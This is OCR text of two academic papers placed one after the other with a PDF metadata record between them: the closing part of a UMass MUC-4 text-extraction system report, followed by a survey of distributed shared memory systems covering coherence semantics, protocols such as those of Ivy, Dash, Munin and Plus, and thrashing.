TST3 were not recognized by our system. Of these, 696 occurred only once. Of the remaining 312 words, the vast majority were proper names. A visual inspection of the unrecognized word list suggested that our lexicon was apparently adequate for the demands of TST3. However, this does not mean that all of our associated definitions were above reproach. Although our dictionary contains a total of 389 concept node definitions, only 172 of these were used during TST3. A frequency analysis of these 172 definitions showed that 20% of the definitions generated 74% of the string fills. A total of 37 (22%) concept node definitions failed to produce any string fills (perhaps these contain no variable slots or maybe they were discarded during consolidation), while one concept node definition produced 65 string fills, and three others produced over 50 string fills (each). Figure 3 shows the complete frequency distribution. Comparing TST3 and TST4 Although our F-scores suggest dramatic differences between TST3 and TST4, there appears to be a single factor that is responsible for these divergent score summaries. Table 2 shows a more detailed perspective on the differences and similarities between TST3 and TST4. Reviewing the scores in Table 5, we see that there is a remarkable similarity across most of the scores for TST3 and TST4. TST4 was even better than TST3 under String Fills Only. The major differences appear in the precision and overgeneration scores for Matched/Spurious and All Templates. These differences also correspond to a striking difference in the number of spurious templates generated for TST3 (16) and TST4 (31). Looking deeper into the problem, we determined that two factors seemed to contribute to the large number of spurious templates in TST4. Table 2: TST3 and TST4 score reports from the official UMass/MUC-4 test runs <table> <thead> <tr> <th></th> <th>TST3</th> <th>TST4</th> </tr> </thead> <tbody> <tr> <td></td> <td>REC</td> <td>PRE</td> </tr> <tr> <td>MATCHED/MISSING</td> <td>47</td> <td>67</td> </tr> <tr> <td>MATCHED/SPURIOUS</td> <td>60</td> <td>57</td> </tr> <tr> <td>MATCHED/ONLY</td> <td>60</td> <td>67</td> </tr> <tr> <td>ALL TEMPLATES</td> <td>47</td> <td>52</td> </tr> <tr> <td>SET FILLS ONLY</td> <td>50</td> <td>71</td> </tr> <tr> <td>STRING FILLS ONLY</td> <td>37</td> <td>57</td> </tr> <tr> <td>F-SCORES</td> <td>51.52</td> <td>54.67</td> </tr> </tbody> </table> First, many legitimate templates were deemed spurious because of mapping problems. We can see some evidence of this by running a comparative test designed to assess the impact of templates lost due to incorrect incident-type slot fills. In the comparative test, we will use "ATTACK" as the slot fill for all incident-type slots. This will ensure that no template is deemed spurious because an incident-type is blocking it from being mapped to a key template. Table 3 shows the resulting F scores from comparative test runs for both TST3 and TST4, running the official UMass/MUC-4 system and generating batch score reports throughout. <table> <thead> <tr> <th></th> <th>P&amp;R</th> <th>2P&amp;R</th> <th>P&amp;2R</th> </tr> </thead> <tbody> <tr> <td>TST3 - official system</td> <td>46.47</td> <td>49.64</td> <td>43.68</td> </tr> <tr> <td>TST3 - &quot;all attacks&quot; is on</td> <td>45.46</td> <td>48.63</td> <td>42.67</td> </tr> <tr> <td>TST4 - official system</td> <td>39.44</td> <td>38.56</td> <td>40.36</td> </tr> <tr> <td>TST4 - &quot;all attacks&quot; is on</td> <td>40.98</td> <td>40.38</td> <td>41.58</td> </tr> </tbody> </table> Table 3: The Effect of Spurious Templates Lost to Incorrect Incident-Types In comparing the net effect of the "all attacks" heuristic, we find that there is no advantage to any of the F-scores when all templates are typed as attacks in TST3. Indeed, there is a uniform drop of one point across the board when "all attacks" is turned on. On the other hand, the F scores for TST4 all benefit from the "all attacks" heuristic. P&R goes up 1.54, 2P&R goes up 1.82, and P&2R goes up 1.22. This tells us that we did not tend to lose otherwise legitimate templates because of their incident types in TST3, whereas a significant number of legitimate templates were lost for this reason in TST4. Precision is most dramatically affected by these errors, but P&R may have lost at least 2 points because of this problem (it is not possible to extrapolate from batch scores to interactive scores with complete certainty). Second, a large number of spurious templates were created when military targets were not recognized to be military in nature. We have already seen how military clashes were the single greatest source of spurious string fills in TST3. Even so, we generated only 3 spurious templates due to false hits on military targets in TST3. In TST4 we generated 12 spurious templates for the same reason. If we assume that each spurious template contains 11 slot fills (a reasonable assumption when template filtering is in place), it follows that 132 spurious slot fills are coming from false hits on military targets in TST4. Removing 132 spurious slot fills from the TST4 score report, the precision score under All Templates goes from 42 to 48, and the P&R score goes up about 3 points as a result. RESOURCES, SPIN-OFFS, AND FUTURE RESEARCH Our primary system development and testing took place on three Texas Instruments Explorer II workstations each configured with 8 megabytes of RAM. Two Texas Instrument MicroExplorers, each with 8 megabytes of RAM, were used for the development of the AutoSlog lexicon. All development was done in Common Lisp. The system code and lexicons required 14 megabytes of storage on a Vax VMS fileserver, 8 of which comprised the AutoSlog development files. System output was stored on a Decstation running Ultrix, where the scoring program was run. System testing required 250 megabytes of storage for response files and score reports. The two official test sets, TST3 and TST4, each took about 75 minutes to process on an Explorer II, using the workstation's local disk for all file output. The development of our UMass/MUC-4 system has continued off and on for two years now. Last year we estimated that 2.25 person-years was invested in the UMass/MUC-3 system. This year we were able to build on that investment, and focus our effort more effectively on the critical issues of portability and scalability. All told, we estimate that one person/year of effort went into MUC-4 after MUC-3: 30% on testing, maintenance, and data analysis; 30% on CIRCUS enhancements and dictionaries; 15% on memory-based consolidation; 15% on MUC-4 updates and documentation; 10% on training for new personnel. In the period since MUC-3, a number of related research projects have been pursued that did not directly contribute to MUC-4, but which address basic research issues associated with CIRCUS and text extraction systems. We have demonstrated that case-base reasoning and machine learning techniques can be successfully applied to the disambiguation of relative pronouns [1, 2, 3]; experiments have shown how CIRCUS can be used to support relevancy feedback algorithms for text classification [5]; and additional experiments have been conducted with a stochastic database derived from the MUC-3 corpus [4]. We expect to see similarly successful spin-offs from MUC-4 in the areas of automated dictionary construction and automated system scale-up. We will continue to exploit the MUC-3 corpus in pursuing these new directions, and we expect to gain additional experience with at least one new application domain as well. ACKNOWLEDGEMENTS This work was supported in part by the Defense Advance Research Projects Agency and monitored by Science Applications International Corporation under contract No. N666001-90-D-0192; DO#22. BIBLIOGRAPHY
{"Source-Url": "https://apps.dtic.mil/dtic/tr/fulltext/u2/a458574.pdf", "len_cl100k_base": 6249, "olmocr-version": "0.1.50", "pdf-total-pages": 9, "total-fallback-pages": 0, "total-input-tokens": 23846, "total-output-tokens": 7046, "length": "2e12", "weborganizer": {"__label__adult": 0.0005078315734863281, "__label__art_design": 0.0005326271057128906, "__label__crime_law": 0.0009441375732421876, "__label__education_jobs": 0.00518798828125, "__label__entertainment": 0.0002359151840209961, "__label__fashion_beauty": 0.00030684471130371094, "__label__finance_business": 0.0004153251647949219, "__label__food_dining": 0.0004892349243164062, "__label__games": 0.0007615089416503906, "__label__hardware": 0.0010662078857421875, "__label__health": 0.001087188720703125, "__label__history": 0.0006470680236816406, "__label__home_hobbies": 0.00014340877532958984, "__label__industrial": 0.0007266998291015625, "__label__literature": 0.0029850006103515625, "__label__politics": 0.0006608963012695312, "__label__religion": 0.0007462501525878906, "__label__science_tech": 0.273681640625, "__label__social_life": 0.0003409385681152344, "__label__software": 0.027008056640625, "__label__software_dev": 0.68017578125, "__label__sports_fitness": 0.00033593177795410156, "__label__transportation": 0.0005855560302734375, "__label__travel": 0.0002114772796630859}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 27368, 0.06937]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 27368, 0.1639]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 27368, 0.90878]], "google_gemma-3-12b-it_contains_pii": [[0, 3989, false], [3989, 5203, null], [5203, 9884, null], [9884, 12384, null], [12384, 14318, null], [14318, 17922, null], [17922, 20437, null], [20437, 24250, null], [24250, 27368, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3989, true], [3989, 5203, null], [5203, 9884, null], [9884, 12384, null], [12384, 14318, null], [14318, 17922, null], [17922, 20437, null], [20437, 24250, null], [24250, 27368, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 27368, null]], "pdf_page_numbers": [[0, 3989, 1], [3989, 5203, 2], [5203, 9884, 3], [9884, 12384, 4], [12384, 14318, 5], [14318, 17922, 6], [17922, 20437, 7], [20437, 24250, 8], [24250, 27368, 9]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 27368, 0.17483]]}
olmocr_science_pdfs
2024-11-28
2024-11-28
7e465931138e32ac0f6049b9d1648ded5501d176
Distributed Shared Memory: A Survey of Issues and Algorithms Bill Nitzberg and Virginia Lo, University of Oregon As we slowly approach the physical limits of processor and memory speed, it is becoming more attractive to use multiprocessors to increase computing power. Two kinds of parallel processors have become popular: tightly coupled shared-memory multiprocessors and distributed-memory multiprocessors. A tightly coupled multiprocessor system — consisting of multiple CPUs and a single global physical memory — is more straightforward to program because it is a natural extension of a single-CPU system. However, this type of multiprocessor has a serious bottleneck: Main memory is accessed via a common bus — a serialization point — that limits system size to tens of processors. Distributed-memory multiprocessors, however, do not suffer from this drawback. These systems consist of a collection of independent computers connected by a high-speed interconnection network. If designers choose the network topology carefully, the system can contain many orders of magnitude more processors than a tightly coupled system. Because all communication between concurrently executing processes must be performed over the network in such a system, until recently the programming model was limited to a message-passing paradigm. However, recent systems have implemented a shared-memory abstraction on top of message-passing distributed-memory systems. The shared-memory abstraction gives these systems the illusion of physically shared memory and allows programmers to use the shared-memory paradigm. As Figure 1 shows, distributed shared memory provides a virtual address space shared among processes on loosely coupled processors. The advantages offered by DSM include ease of programming and portability achieved through the shared-memory programming paradigm, the low cost of distributed-memory machines, and scalability resulting from the absence of hardware bottlenecks. DSM has been an active area of research since the early 1980s, although its foundations in cache coherence and memory management have been extensively studied for many years. DSM research goals and issues are similar to those of research in multiprocessor caches or networked file systems, memories for nonuniform memory access multiprocessors, and management systems for distributed or replicated databases. Because of this similarity, many algorithms and lessons learned in these domains can be transferred to DSM systems and vice versa. However, each of the above systems has unique features (such as communication latency), so each must be considered separately. The advantages of DSM can be realized with reasonably low runtime overhead. DSM systems have been implemented using three approaches (some systems use more than one approach): (1) hardware implementations that extend traditional caching techniques to scalable architectures. (2) operating system and library implementations that achieve sharing and coherence through virtual memory-management mechanisms, and (3) compiler implementations where shared accesses are automatically converted into synchronization and coherence primitives. These systems have been designed on common networks of workstations or minicomputers, special-purpose message-passing machines (such as the Intel iPSC/2), custom hardware, and even heterogeneous systems. This article gives an integrated overview of important DSM issues: memory coherence, design choices, and implementation methods. In our presentation, we use examples from the DSM systems listed and briefly described in the sidebar on page 55. Table 1 compares how design issues are handled in a selected subset of the systems. Design choices A DSM system designer must make choices regarding structure, granularity, access, coherence semantics, scalability, and heterogeneity. Examination of how designers handled these issues in several real implementations of DSM shows the intricacies of such a system. Structure and granularity. The structure and granularity of a DSM system are closely related. Structure refers to the layout of the shared data in memory. Most DSM systems do not structure memory (it is a linear array of words), but some structure the data as objects, language types, or even an associative memory. Granularity refers to the size of the unit of sharing: byte, word, page, or complex data structure. Ivy, one of the first transparent DSM systems, implemented shared memory as virtual memory. This memory was unstructured and was shared in 1-kbyte pages. In systems implemented using the virtual memory hardware of the underlying architecture, it is convenient to choose a multiple of the hardware page size as the unit of sharing. Mirage extended Ivy's single shared-memory space to support a paged segmentation scheme. Users share arbitrary-size regions of memory (segments) while the system maintains the shared space in pages. Hardware implementations of DSM typically support smaller grain sizes. For example, Dash and Memtex also support unstructured sharing, but the unit of sharing is 16 and 32 bytes respectively — typical cache line sizes. Plus is somewhat of a hybrid: The unit of replication is a page, while the unit of coherence is a 32-bit word. Because shared-memory programs provide locality of reference, a process is likely to access a large region of its shared address space in a small amount of time. Therefore, larger "page" sizes reduce paging overhead. However, sharing may also cause contention, and the larger the page size, the greater the likelihood that more than one process will require access to a page. A smaller page reduces the possibility of false sharing, which occurs when two unrelated variables (each used by different processes) are placed in the same page. The page appears shared, even though the original variables were not. Another factor affecting the choice of page size is the need to keep directory information about the pages in the system: the smaller the page size, the larger the directory. A method of structuring the shared memory is by data type. With this method, shared memory is structured as objects in distributed object-oriented systems, as in the Emerald, Choices, and Clouds' systems; or it is structured as variables in the source language, as in the Shared Data-Object Model and Munin systems. Because with these systems the sizes of objects and data types vary greatly, the grain size varies to match the application. However, these systems can still suffer from false sharing when different parts of an object (for example, the top and bottom halves of an array) are accessed by distinct processes. Another method is to structure the shared memory like a database. Linda, a system that has such a model, orders its shared memory as an associative memory called a tuple space. This structure allows the location of data to be separated from its value, but it also requires programmers to use special access functions to interact with the shared-memory space. In most other systems, access to shared data is transparent. Coherence semantics. For programmers to write correct programs on a shared-memory machine, they must understand how parallel memory updates are propagated throughout the <table> <thead> <tr> <th>System Name</th> <th>Current Implementation</th> <th>Structure and Granularity</th> <th>Coherence Semantics</th> <th>Coherence Protocol</th> <th>Sources of Improved Performance</th> <th>Support for Synchronization</th> <th>Heterogeneous Support</th> </tr> </thead> <tbody> <tr> <td>Dash</td> <td>Hardware, modified Silicon Graphics Iris 4D/340 workstations, mesh</td> <td>16 bytes</td> <td>Release</td> <td>Write-invalidate</td> <td>Relaxed coherence, prefetching</td> <td>Queued locks, atomic incrementation and decrementation</td> <td>No</td> </tr> <tr> <td>Ivy</td> <td>Software, Apollo workstations, Apollo ring, modified Aegis</td> <td>1-Kbyte pages</td> <td>Strict</td> <td>Write-invalidate</td> <td>Pointer chain collapse, selective broadcast</td> <td>Synchronized pages, semaphores, event counts</td> <td>No</td> </tr> <tr> <td>Linda</td> <td>Software, variety of environments</td> <td>Tuples</td> <td>No mutable data</td> <td>Varied</td> <td>Hashing</td> <td>?</td> <td></td> </tr> <tr> <td>Memnet</td> <td>Hardware, token ring</td> <td>32 bytes</td> <td>Strict</td> <td>Write-invalidate</td> <td>Vectored interrupt support of control flow</td> <td>Messages for semaphores and signal/wait</td> <td>Yes</td> </tr> <tr> <td>Mermaid</td> <td>Software, Sun workstations, DEC Firefly multiprocessors, Mermaid/native operating system</td> <td>8 Kbytes (Sun), 1 Kbyte (Firefly)</td> <td>Strict</td> <td>Write-invalidate</td> <td></td> <td></td> <td>No</td> </tr> <tr> <td>Mirage</td> <td>Software, VAX 11/750, Ethernet, Locus distributed operating system, Unix System V interface</td> <td>512-byte pages</td> <td>Strict</td> <td>Write-invalidate</td> <td>Kernel-level implementation, time window coherence protocol</td> <td>Unix System V semaphores</td> <td>No</td> </tr> <tr> <td>Munin</td> <td>Software, Sun workstations, Ethernet, Unix System V kernel and Presto parallel programming environment</td> <td>Objects</td> <td>Weak</td> <td>Type-specific (delayed write update for read-mostly protocol)</td> <td>Delayed update queue</td> <td>Synchronized objects</td> <td>No</td> </tr> <tr> <td>Plus</td> <td>Hardware and software, Motorola 88000, Caltech mesh, Plus kernel</td> <td>Page for sharing, word for coherence</td> <td>Processor</td> <td>Nondemand write-update</td> <td>Delayed operations</td> <td>Complex synchronization instructions</td> <td>No</td> </tr> <tr> <td>Shiva</td> <td>Software, Intel iPSC/2, hypercube, Shiva/native operating system</td> <td>4-Kbyte pages</td> <td>Strict</td> <td>Write-invalidate</td> <td>Data structure compaction, memory as backing store</td> <td>Messages for semaphores and signal/wait</td> <td>No</td> </tr> </tbody> </table> The most intuitive semantics for memory coherence is strict consistency. (Although "coherence" and "consistency" are used somewhat interchangeably in the literature, we use coherence as the general term for the semantics of memory operations, and consistency to refer to a specific kind of memory coherence.) In a system with strict consistency, a read operation returns the most recently written value. However, "most recently" is an ambiguous concept in a distributed system. For this reason, and to improve performance, some DSM systems provide only a reduced form of memory coherence. For example, Plus provides processor consistency, and Dash provides only... release consistency. In accordance with the RISC philosophy, both of these tools have mechanisms for forcing co- herence, but their use must be explicitly specified by higher level software (a compiler) or perhaps even the pro- grammer. Relaxed coherence semantics allows more efficient shared access because it requires less synchronization and less data movement. However, programs that depend on a stronger form of coherence can not perform correctly if executed in a system that supports only a weaker form. Figure 2 gives brief definitions of strict, sequential, processor, weak, and release consistency, and illustrates the hierarchical relationship among these types of coherence. Table 1 indicates the coherence semantics supported by some current DSM systems. ![Diagram showing consistency types] **Figure 2. Intuitive definitions of memory coherence. The arrows point from stricter to weaker consistencies.** **DSM systems** This partial listing gives the name of the DSM system, the principal developers of the system, the site and duration of their research, and a brief description of the system. Table 1 gives more informa- tion about the systems followed with an asterisk. Agora (Bisiani and Forin, Carnegie Mellon University, 1987-): A heterogeneous DSM system that allows data structures to be shared across machines. Agora was the first system to sup- port weak consistency. Amber (Chase, Feeley, and Levy, University of Washington, 1988-): An object-based DSM system in which sharing is performed by migrating processes to data as well as data to processes. Capnet (Tam and Farber, University of Delaware, 1990-): An ex- tension of DSM to a wide area network. Choles (Johnston and Campbell, University of Illinois, 1988-): DSM incorporated into a hierarchical object-oriented distrib- uted operating system. Clouds (Ramachandran and Khalidi, Georgia Institute of Tech- nology, 1987-): An object-oriented distributed operating system where objects can migrate. Dash* (Lenoski, Laudon, Bharacheri, Gupta, and Hennessy, Stanford University, 1988?): A hardware implementation of DSM with a directory-based coherence protocol. Dash provides release consistency. Emerald (Jil, Levy, Hutchinson, and Black, University of Wash- ington, 1986-1988): An object-oriented language and system that indirectly supports DSM through object mobility. Ivy* (Li, Yale University, 1984-1996): An early page-oriented DSM on a network of Apollo workstations. Linda* (Carriero and Gelernter, Yale University, 1982-): A shared associative object memory with access functions. Linda can be implemented for many languages and machines. Memnet* (Delp and Farber, University of Delaware, 1986-1988): A hardware implementation of DSM implemented on a 200-Mips token ring used to broadcast invalidates and read requests. Mermaid* (Stumma, Zhou, Li, and Wortman, University of Toronto and Princeton University, 1988-1991): A heterogeneous DSM sys- tem where the compiler forces shared pages to contain a single data type. Type conversion is performed on reference. Mether (Minnich and Farber, Supercomputing Research Center, Bowie, Md., 1990-): A transparent DSM based on SunOS 4.0. Mether allows applications to access an inconsistent state for efficiency. Mirog* (Fleisch and Popek, University of California at Los Angeles, 1987-1989): A kernel-level implementation of DSM. Mirog reduces thrashing by prohibiting a page from being stolen before a minimum amount of time (A) has elapsed. Munin* (Bennett, Carter, and Zwanenpoel, Rice University, 1988-): An object-based DSM system that investigates type- specific coherence protocols. Plus* (Bisiani and Ravishankar, Carnegie Mellon University, 1988-): A hardware implementation of DSM. Plus uses a write- update coherence protocol and performs replication only by pro- gram request. Shared Data-Object Model (Bal, Kaashoek, and Tannen- baum, Vrije University, Amsterdam, The Netherlands, 1988-): A DSM implementation on top of the Amoeba distributed operat- ing system. Shiva* (Li and Schaefer, Princeton University, 1988-): An Ivy-like DSM system for the Intel IPSC/2 hypercube. Scalability. A theoretical benefit of DSM systems is that they scale better than tightly coupled shared-memory multiprocessors. The limits of scalability are greatly reduced by two factors: central bottlenecks (such as the bus of a tightly coupled shared-memory multiprocessor), and global common knowledge operations and storage (such as broadcast messages or full directories, whose sizes are proportional to the number of nodes). Li and Hudak went through several iterations to refine a coherence protocol for Ivy before arriving at their dynamic distributed-manager algorithm, which avoids centralized bottlenecks. However, Ivy and most other DSM systems are currently implemented on top of Ethernet (itself a centralized bottleneck), which can support only about 100 nodes at a time. This limitation is a result of these systems being research tools rather than an indication of any real design flaw. Shiva is an implementation of DSM on an Intel iPSC/2 hypercube, and it should scale nicely. Nodes in the Dash system are connected to two meshes. This implies that the machine should be expandable, but the Dash prototype is currently limited by its use of a full bit vector (one bit per node) to keep track of page replication. Heterogeneity. At first glance, sharing memory between two machines with different architectures seems almost impossible. The machines may not even use the same representation for basic data types (integers, floating-point numbers, and so on). It is a bit easier if the DSM system is structured as variables or objects in the source language. Then a DSM compiler can add conversion routines to all accesses to shared memory. In the case of the DSM system, memory is structured as objects shared among heterogeneous machines. Mermaid explores another novel approach: Memory is shared in pages, and a page can contain only one type of data. Whenever a page is moved between two architectures different systems, a conversion routine converts the data in the page to the appropriate format. Although heterogeneous DSM might allow more machines to participate in a computation, the overhead of conversion seems to outweigh the benefits. Implementation A DSM system must automatically transform shared-memory access into interprocess communication. This requires algorithms to locate and access shared data, maintain coherence, and replace data. A DSM system may also have additional schemes to improve performance. Such algorithms directly support DSM. In addition, DSM implementers must tailor operating system algorithms to support process synchronization and memory management. We focus on the algorithms used in Ivy, Dash, Munin, Plus, Mirage, and Memnet because these systems illustrate most of the important implementation issues. Stumm and Zhou give a good evolutionary overview of algorithms that support static, migratory, and replicated data. Data location and access. To share data in a DSM system, a program must be able to find and retrieve the data it needs. If data does not move around in the system — it resides only in a single location — then locating it is easy. All processes simply "know" where to obtain any piece of data. Some Linda implementations use hashing on the tuples to distribute data statically. This has the advantages of being simple and fast, but may cause a bottleneck if data is not distributed properly (for example, all shared data ends up on a single node). An alternative is to allow data to migrate freely throughout the system. This allows data to be redistributed dynamically to where it is being used. However, locating data then becomes more difficult. In this case, the simplest way to locate data is to have a centralized server that keeps track of all shared data. The centralized method suffers from two drawbacks: The server serializes location queries, reducing parallelism, and the server may become a single point of failure. Instead of using a centralized server, a system can broadcast requests for data. Unfortunately, broadcasting does not scale well. All nodes — not just the nodes containing the data — must process a broadcast request. The network latency of a broadcast may also require accesses to take a long time to complete. To avoid broadcasts and distribute the load more evenly, several systems use an owner-based distributed scheme. This scheme is independent of data replication, but is seen mostly in systems that support both data migration and replication. Each piece of data has an associated owner — a node with the primary copy of the data. The owners change as the data migrates through the system. When another node needs a copy of the data, it sends a request to the owner. If the owner still has the data, it returns the data. If the owner has given the data to some other node, it forwards the request to the new owner. The drawback with this scheme is that a request may be forwarded many times before reaching the current owner. In some cases, this is more wasteful than broadcasting. In Ivy, all nodes involved in forwarding a request (including the requester) are given the identity of the current owner. This collapsing of pointer chains helps reduce the forwarding overhead and delay. When it replicates data, a DSM system must keep track of the replicated copies. Dash uses a distributed directory-based scheme, implemented in hardware. The Dash directory for a given cluster (node) keeps track of the physical blocks in that cluster. Each block is represented by a directory entry that specifies whether the block is unshared (local copy only), shared remote, or shared dirty. If the block is shared remote, the directory entry also indicates the location of replicated copies of the block. If the block is shared dirty, the directory entry indicates the location of the single dirty copy. Only the special node known as the home cluster possesses the directory block entry. A node accesses nonlocal data for reading by sending a message to the home cluster. Ivy’s dynamic distributed scheme also supports replicated data. A ptable on each node contains for each page an entry that indicates the probable location for the referenced page. As described above, a node locates data by following the chain of probable owners. The copy-list scheme implemented by Plus uses a distributed linked list to keep track of replicated data. Memory references are mapped to the physically closest copy by the page map table. Coherence protocol. All DSM systems provide some form of memory coherence. If the shared data is not replicated, then enforcing memory coherence is trivial. The underlying network automatically serializes requests in the order they Figure 3. Simplified Dash write-invalidate protocol: (a) Data is shared remote; (b) data is dirty remote (after events depicted in Figure 3a). (DC stands for directory controller.) occur. A node handling shared data can merely perform each request as it is received. This method will ensure strict memory consistency — the strongest form of coherence. Unfortunately, serializing data access creates a bottleneck and makes impossible a major advantage of DSM: parallelism. To increase parallelism, virtually all DSM systems replicate data. Thus, for example, multiple reads can be performed in parallel. However, replication complicates the coherence protocol. Two types of protocols — write-invalidate and write-update protocols — handle replication. In a write-invalidate protocol, there can be many copies of a read-only piece of data, but only one copy of a writable piece of data. The protocol is called write-invalidate because it invalidates all copies of a piece of data except one before a write can proceed. In a write-update scheme, however, a write updates all copies of a piece of data. Most DSM systems have write-invalidate coherence protocols. All the protocols for these systems are similar. Each piece of data has a status tag that indicates whether the data is valid, whether it is shared, and whether it is read-only or writable. For a read, if the data is valid, it is returned immediately. If the data is not valid, a read request is sent to the location of a valid copy, and a copy of the data is returned. If the data was writable on another node, this read request will cause it to become read-only. The copy remains valid until an invalidate request is received. For a write, if the data is valid and writable, the request is satisfied immediately. If the data is not writable, the directory controller sends out an invalidate request, along with a request for a copy of the data if the local copy is not valid. When the invalidate completes, the data is valid locally and writable, and the original write request may complete. Figure 3 illustrates the Dash directory- based coherence protocol. The sequence of events and messages shown in Figure 3a occurs when the block to be written is in remote state (multiple read-only copies on nodes A and B) just before the write. Figure 3b shows the events and messages that occur when the block to be written is in shared-dirty state (single dirty copy on node C) just before the write. In both cases, the initiator of the write sends a request to the home cluster, which uses the information in the directory to locate and transfer the data and to invalidate copies. Lenoski et al. give further details about the Dash coherence protocol and the methods they used to fine-tune the protocol for high performance. Li and Hudak show that the write invalidate protocol performs well for a variety of applications. In fact, they show superlinear speedups for a linear equation solver and a three-dimensional partial differential equation solver, resulting from the increased overall physical memory and cache sizes. Li and Hudak rejected use of a write-update protocol at the onset with the reasoning that network latency would make it inefficient. Subsequent research indicates that in the appropriate hardware environment write-update protocols can be implemented efficiently. For example, Plus is a hardware implementation of DSM that uses a write-update protocol. Figure 4 traces the Plus write-update protocol, which begins all updates with the block’s master node, then proceeds down the copy-list chain. The write operation is completed when the last node in the chain sends an acknowledgment message to the originator of the write request. Munin uses type-specific memory coherence protocols tailored for different types of data. For example, Munin uses a write-update protocol to keep coherent data that is read more often than it is written (read-mostly data). Because an invalidation message is about the same size as an update message, an update costs no more than an invalidate. However, the overhead of making multiple read-only copies of the data item after each invalidate is avoided. An eager paging strategy supports the Munin producer-consumer memory type. Data, once written by the producer process, is transferred to the consumer process where it remains available until the consumer process is ready to use it. This reduces overhead since the consumer does not request a data already available in the buffer. Replacement strategy. In systems that allow data to migrate around the system, two problems arise when the available space for “caching” shared data fills up: Which data should be replaced to free space and where should it go? In choosing the data item to be replaced, a DSM system works almost like the cacha. 58 copy of an item when it is not needed elsewhere in the system. This method is simple to implement, but it wastes a lot of memory. An improvement is to have the node that wants to delete the item simply page it out onto disk. Although this does not waste any memory space, it is time consuming. Because it may be faster to transfer something over the network than to transfer it to disk, a better solution (used in Shiva) is to keep track of free memory in the system and to simply page the item out to a node with space available to it. **Thrashing.** DSM systems are particularly prone to thrashing. For example, if two nodes compete for write access to a single data item, it may be transferred back and forth at such a high rate that no real work can get done (a Ping-Pong effect). Two systems, Munin and Mirage, attack this problem directly. Munin allows programmers to associate types with shared data: write-only, write-many, producer-consumer, private, migratory, result, read-mostly, synchronization, and general read/write. Shared data of different types get different coherence protocols. To avoid thrashing with two competing writers, a programmer could specify the type as write-many and the system would use a delayed write policy. (Munin does not guarantee strict consistency of memory in this case.) Tailoring the coherence algorithm to the shared-data usage patterns can greatly reduce thrashing. However, Munin requires programmers to specify the type of shared data. Programmers are notoriously bad at predicting the behavior of their programs, so this method may not be any better than choosing a particular protocol. In addition, because the type remains static once specified, Munin cannot dynamically adjust to an application's changing behavior. **Mirage** uses another method to reduce thrashing. It specifically examines the case when many nodes compete for access to the same page. To stop the Ping-Pong effect, Mirage adds a dynamically tunable parameter to the coherence protocol. This parameter determines the minimum amount of time ($\Delta$) a page will be available at a node. For example, if a node performed a write to a shared page, the page would be writable on that node for $\Delta$ time. This solves the problem of having a page stolen away after only a single request on a node can be satisfied. Because $\Delta$ is tuned dynamically on the basis of access patterns, a process can complete a write run (or read run) before losing access to the page. Thus, $\Delta$ is akin to a time slice in a multitasking operating system, except in Mirage it is dynamically adjusted to meet an application's specific needs. **Related algorithms.** To support a DSM system, synchronization operations and memory management must be specially tuned. Semaphores, for example, are typically implemented on shared-memory systems by using spin locks. In a DSM system, a spin lock can easily cause thrashing, because multiple nodes may heavily access shared data. For better performance, some systems provide specialized synchronization primitives along with DSM. Clouds provides semaphore operations by grouping semaphores into centrally managed segments. Munin supports the synchronization memory type with distributed locks. Puls supplies a variety of synchronization instructions, and supports delayed execution, in which the synchronization can be initiated, then later for successful completion. Dubois, Scheurich, and Briggs discuss the relationship between coherence and synchronization. **Memory management can be restructured for DSM.** A typical memory-allocation scheme (as in the C library malloc()) allocates memory out of a common pool, which is searched each time a request is made. A linear search of all shared memory can be expensive. A better approach is to partition available memory into private buffers on each node and allocate memory from the global buffer space only when the private buffer is empty. Research has shown distributed shared memory systems to be viable. The systems described in this article demonstrate that DSM can be implemented in a variety of hardware and software environments: commercial workstations with native operating systems software, innovative customized hardware, and even heterogeneous systems. Many of the design choices and algorithms needed to implement DSM are well understood and integrated with related areas of computer science. The performance of DSM is greatly affected by memory-access patterns and replication of shared data. Hardware implementations have yielded enormous reductions in communication latency and the advantages of a smaller unit of sharing. However, the performance results to date are preliminary. Most systems are experimental or prototypes consisting of only a few nodes. In addition, because of the dearth of test programs, most studies are based on a small group of applications or a synthetic workload. Nevertheless, research has proved that DSM effectively supports parallel processing, and it promises to be a fruitful and exciting area of research for the coming decade. **Acknowledgments** This work was supported in part by NSF grant CCR-8808532, a Tektronix research fellowship, and the NSF Research Experiences for Undergraduates program. We appreciate the comments from the anonymous referees and thank the authors who verified information about their systems. Thanks also to Kurt Windisch for helping prepare this manuscript. **References** Bill Nitzberg is a PhD student in the Department of Computer and Information Science at the University of Oregon. In the AT&T-sponsored ACM International Programming Contest, Nitzberg was a member of the 1990 team and coached the 1991 team, which placed eighth and sixth, respectively. Nitzberg received a BS in mathematics and an MS in computer science, both from the University of Oregon. He is a member of ACM. Virginia Lo is an assistant professor in the Department of Computer and Information Science at the University of Oregon. Her research interests include distributed operating systems and the mapping of parallel algorithms to parallel architectures. Lo received a BA from the University of Michigan, an MS in computer science from Pennsylvania State University, and a PhD in computer science from the University of Illinois at Urbana-Champaign. She is a member of the IEEE, the IEEE Computer Society, and the ACM. Readers can reach the authors at the Department of Computer Science, University of Oregon, Eugene, OR 97403; e-mail [last name]@cs.uoregon.edu. A Symposium on High-Performance Chips August 26-27, 1991 